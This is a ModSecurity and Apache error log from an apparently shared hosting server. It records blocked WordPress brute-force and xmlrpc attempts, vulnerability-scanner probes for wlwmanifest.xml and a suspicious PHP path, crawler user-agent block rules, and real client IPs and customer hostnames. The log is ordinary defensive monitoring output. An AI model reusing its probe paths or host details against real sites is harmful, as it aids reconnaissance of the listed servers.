[Tue May 26 16:45:10.838270 2026] [security2:error] [pid 823496:tid 823678] [client 117.198.37.168:60400] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAvpa08mrtyBNpA4PQVgAAADI"]
[Tue May 26 16:45:11.993823 2026] [security2:error] [pid 823496:tid 823745] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAv5a08mrtyBNpA4PQXAAAAHU"]
[Tue May 26 16:45:13.079285 2026] [security2:error] [pid 817651:tid 817847] [client 76.32.195.149:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAwNlGRCPPN1dS2y2y8QAAAMc"]
[Tue May 26 16:45:14.244604 2026] [security2:error] [pid 817651:tid 817813] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAwdlGRCPPN1dS2y2y-gAAAKU"]
[Tue May 26 16:45:14.257701 2026] [security2:error] [pid 823496:tid 823549] [remote 216.73.216.30:59241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAwpa08mrtyBNpA4PQhQAAFjI"]
[Tue May 26 16:45:15.617177 2026] [security2:error] [pid 817651:tid 817870] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAw9lGRCPPN1dS2y2zAgAAAN4"]
[Tue May 26 16:45:18.088272 2026] [security2:error] [pid 817651:tid 817816] [client 185.184.197.227:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWAxNlGRCPPN1dS2y2zDQAAAKg"]
[Tue May 26 16:45:18.274064 2026] [security2:error] [pid 817651:tid 817811] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAxNlGRCPPN1dS2y2zEAAAAKM"]
[Tue May 26 16:45:19.999395 2026] [security2:error] [pid 823496:tid 823671] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAx5a08mrtyBNpA4PQqQAAACs"]
[Tue May 26 16:45:20.516925 2026] [security2:error] [pid 823496:tid 823641] [client 45.205.1.28:58163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "juniorwoodies.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahWAyJa08mrtyBNpA4PQvQAAAA0"]
[Tue May 26 16:45:21.048830 2026] [security2:error] [pid 823496:tid 823695] [client 117.198.37.168:60716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAyZa08mrtyBNpA4PQxQAAAEM"]
[Tue May 26 16:45:21.048929 2026] [security2:error] [pid 823496:tid 823695] [client 117.198.37.168:60716] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAyZa08mrtyBNpA4PQxQAAAEM"]
[Tue May 26 16:45:21.230088 2026] [security2:error] [pid 817651:tid 817882] [client 94.26.106.125:50292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.acacia.org.in"] [uri "/wp-login.php"] [unique_id "ahWAydlGRCPPN1dS2y2zQgAAAOo"]
[Tue May 26 16:45:21.550057 2026] [security2:error] [pid 817651:tid 817809] [client 94.26.106.125:55979] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.acacia.org.in"] [uri "/wp-login.php"] [unique_id "ahWAydlGRCPPN1dS2y2zSQAAAKE"]
[Tue May 26 16:45:21.874277 2026] [security2:error] [pid 823496:tid 823723] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAyJa08mrtyBNpA4PQwAAAAF8"]
[Tue May 26 16:45:24.231230 2026] [security2:error] [pid 823496:tid 823690] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAy5a08mrtyBNpA4PQ1wAAAD4"]
[Tue May 26 16:45:24.345751 2026] [core:error] [pid 823496:tid 823677] [client 74.7.244.15:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:45:24.345778 2026] [core:error] [pid 823496:tid 823677] [client 74.7.244.15:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 16:45:24.345896 2026] [security2:error] [pid 823496:tid 823677] [client 74.7.244.15:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.arborvitae.in"] [uri "/___proxy_subdomain_webmail/index.php"] [unique_id "ahWAzJa08mrtyBNpA4PQ4AAAADE"]
[Tue May 26 16:45:24.346705 2026] [security2:error] [pid 823496:tid 823755] [client 74.7.244.15:51976] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.arborvitae.in"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWAzJa08mrtyBNpA4PQ3wAAf0U"]
[Tue May 26 16:45:25.060405 2026] [security2:error] [pid 817651:tid 817903] [client 74.7.228.58:51994] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "webmail.arenterprise.services"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWAzdlGRCPPN1dS2y2zcgAAAP8"]
[Tue May 26 16:45:25.704557 2026] [security2:error] [pid 817651:tid 817818] [client 35.94.96.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahWAzdlGRCPPN1dS2y2zewAAAKo"]
[Tue May 26 16:45:26.976115 2026] [security2:error] [pid 823496:tid 823645] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAzZa08mrtyBNpA4PQ6gAAABE"]
[Tue May 26 16:45:27.866661 2026] [security2:error] [pid 817651:tid 817785] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAztlGRCPPN1dS2y2zggAAAIk"]
[Tue May 26 16:45:28.456788 2026] [security2:error] [pid 817651:tid 817824] [client 114.119.155.83:50879] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahWA0NlGRCPPN1dS2y2zlgAAALA"], referer: http://glorodavionics.com/beta/index.php?route=product/category&path=72_17_89
[Tue May 26 16:45:29.954735 2026] [security2:error] [pid 823496:tid 823632] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA0Za08mrtyBNpA4PQ_wAAAAQ"]
[Tue May 26 16:45:31.155720 2026] [security2:error] [pid 823496:tid 823750] [client 185.109.14.26:14823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 26.14.109.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "operatives.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWA0pa08mrtyBNpA4PRCQAAAHo"]
[Tue May 26 16:45:31.155864 2026] [security2:error] [pid 823496:tid 823750] [client 185.109.14.26:14823] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "operatives.org.in"] [uri "/xmlrpc.php"] [unique_id "ahWA0pa08mrtyBNpA4PRCQAAAHo"]
[Tue May 26 16:45:31.564132 2026] [security2:error] [pid 823496:tid 823704] [client 117.198.37.168:61036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA05a08mrtyBNpA4PRFgAAAEw"]
[Tue May 26 16:45:31.564273 2026] [security2:error] [pid 823496:tid 823704] [client 117.198.37.168:61036] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA05a08mrtyBNpA4PRFgAAAEw"]
[Tue May 26 16:45:32.290581 2026] [security2:error] [pid 823496:tid 823690] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA05a08mrtyBNpA4PREgAAAD4"]
[Tue May 26 16:45:34.125723 2026] [security2:error] [pid 823496:tid 823674] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA1Za08mrtyBNpA4PROwAAAC4"]
[Tue May 26 16:45:34.378231 2026] [security2:error] [pid 823496:tid 823508] [remote 216.73.216.30:1193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWA1pa08mrtyBNpA4PRaAAAYwk"]
[Tue May 26 16:45:36.356798 2026] [core:crit] [pid 823496:tid 823702] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:45:36.524108 2026] [security2:error] [pid 823496:tid 823709] [client 136.144.42.203:63217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.42.144.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWA2Ja08mrtyBNpA4PRfwAAAFE"]
[Tue May 26 16:45:36.758053 2026] [security2:error] [pid 817651:tid 817852] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA19lGRCPPN1dS2y2z1wAAAMw"]
[Tue May 26 16:45:37.261193 2026] [security2:error] [pid 817651:tid 817786] [client 110.249.202.130:58364] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahWA2dlGRCPPN1dS2y2z4wAAAIo"]
[Tue May 26 16:45:37.933208 2026] [security2:error] [pid 823496:tid 823629] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA2Za08mrtyBNpA4PRlQAAAAE"]
[Tue May 26 16:45:38.096213 2026] [security2:error] [pid 823496:tid 823738] [client 31.57.184.20:54738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "adityacreations.co.in"] [uri "/wp-login.php"] [unique_id "ahWA2Za08mrtyBNpA4PRngAAAG4"]
[Tue May 26 16:45:38.501026 2026] [security2:error] [pid 823496:tid 823659] [client 31.57.184.20:55122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "adityacreations.co.in"] [uri "/wp-login.php"] [unique_id "ahWA2pa08mrtyBNpA4PRqwAAAB8"]
[Tue May 26 16:45:39.631578 2026] [security2:error] [pid 817651:tid 817677] [remote 216.73.216.30:36146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWA29lGRCPPN1dS2y2z_QAAtRk"]
[Tue May 26 16:45:39.780370 2026] [security2:error] [pid 817651:tid 817824] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA2tlGRCPPN1dS2y2z8QAAALA"]
[Tue May 26 16:45:42.140910 2026] [security2:error] [pid 823496:tid 823674] [client 117.198.37.168:61354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA3pa08mrtyBNpA4PR6AAAAC4"]
[Tue May 26 16:45:42.141040 2026] [security2:error] [pid 823496:tid 823674] [client 117.198.37.168:61354] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWA3pa08mrtyBNpA4PR6AAAAC4"]
[Tue May 26 16:45:42.279970 2026] [security2:error] [pid 823496:tid 823721] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA3Za08mrtyBNpA4PR3gAAAF0"]
[Tue May 26 16:45:43.456075 2026] [security2:error] [pid 823496:tid 823658] [client 157.35.97.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA3pa08mrtyBNpA4PR7QAAAB4"]
[Tue May 26 16:45:43.899263 2026] [security2:error] [pid 817651:tid 817854] [client 94.26.106.125:49336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acacia.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWA39lGRCPPN1dS2y20cAAAAM4"]
[Tue May 26 16:45:44.222305 2026] [security2:error] [pid 817651:tid 817879] [client 94.26.106.125:49803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acacia.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWA4NlGRCPPN1dS2y20dQAAAOc"], referer: https://duckduckgo.com/
[Tue May 26 16:45:44.235548 2026] [security2:error] [pid 817651:tid 817886] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA39lGRCPPN1dS2y20XAAAAO4"]
[Tue May 26 16:45:44.391568 2026] [security2:error] [pid 817651:tid 817716] [remote 216.73.216.30:36146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWA4NlGRCPPN1dS2y20eQAA_UA"]
[Tue May 26 16:45:46.192556 2026] [security2:error] [pid 823496:tid 823679] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA4Za08mrtyBNpA4PSDQAAADM"]
[Tue May 26 16:45:46.893689 2026] [security2:error] [pid 817651:tid 817800] [client 34.30.27.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWA4tlGRCPPN1dS2y20iAAAAJg"]
[Tue May 26 16:45:47.007729 2026] [security2:error] [pid 823496:tid 823663] [client 34.30.27.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWA45a08mrtyBNpA4PSJAAAACM"]
[Tue May 26 16:45:47.277010 2026] [security2:error] [pid 823496:tid 823658] [client 34.30.27.152:51241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 152.27.30.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ucdc.co.in"] [uri "/xmlrpc.php"] [unique_id "ahWA45a08mrtyBNpA4PSJgAAAB4"]
[Tue May 26 16:45:47.438655 2026] [security2:error] [pid 823496:tid 823673] [client 34.30.27.152:50736] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWA45a08mrtyBNpA4PSMgAAAC0"]
[Tue May 26 16:45:47.687817 2026] [security2:error] [pid 817651:tid 817814] [client 34.30.27.152:50766] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWA49lGRCPPN1dS2y20lAAAAKY"]
[Tue May 26 16:45:47.908637 2026] [security2:error] [pid 817651:tid 817786] [client 34.30.27.152:63326] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWA49lGRCPPN1dS2y20lQAAAIo"]
[Tue May 26 16:45:48.115188 2026] [security2:error] [pid 823496:tid 823697] [client 34.30.27.152:59041] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWA5Ja08mrtyBNpA4PSOgAAAEU"]
[Tue May 26 16:45:48.115337 2026] [security2:error] [pid 823496:tid 823678] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWA45a08mrtyBNpA4PSLgAAADI"]
[Tue May 26 16:45:48.337698 2026] [security2:error] [pid 817651:tid 817789] [client 34.30.27.152:62668] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWA5NlGRCPPN1dS2y20mQAAAI0"]
[Tue May 26 16:45:48.651346 2026] [security2:error] [pid 823496:tid 823718] [client 34.30.27.152:62968] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWA5Ja08mrtyBNpA4PSQgAAAFo"]
[Tue May 26 16:45:48.855404 2026] [security2:error] [pid 823496:tid 823643] [client 34.30.27.152:58590] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWA5Ja08mrtyBNpA4PSRAAAAA8"]
[Tue May 26 16:45:49.054477 2026] [security2:error] [pid 823496:tid 823646] [client 34.30.27.152:57283] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "ucdc.co.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWA5Za08mrtyBNpA4PSRgAAABI"]
[Tue May 26 16:45:49.217224 2026] [security2:error] [pid 823496:tid 823665] [client 185.191.171.16:27738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-camp-week/list/"] [unique_id "ahWA5Za08mrtyBNpA4PSSQAAACU"]
[Tue May 26 16:45:49.217457 2026] [security2:error] [pid 823496:tid 823665] [client 185.191.171.16:27738] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-camp-week/list/"] [unique_id "ahWA5Za08mrtyBNpA4PSSQAAACU"]
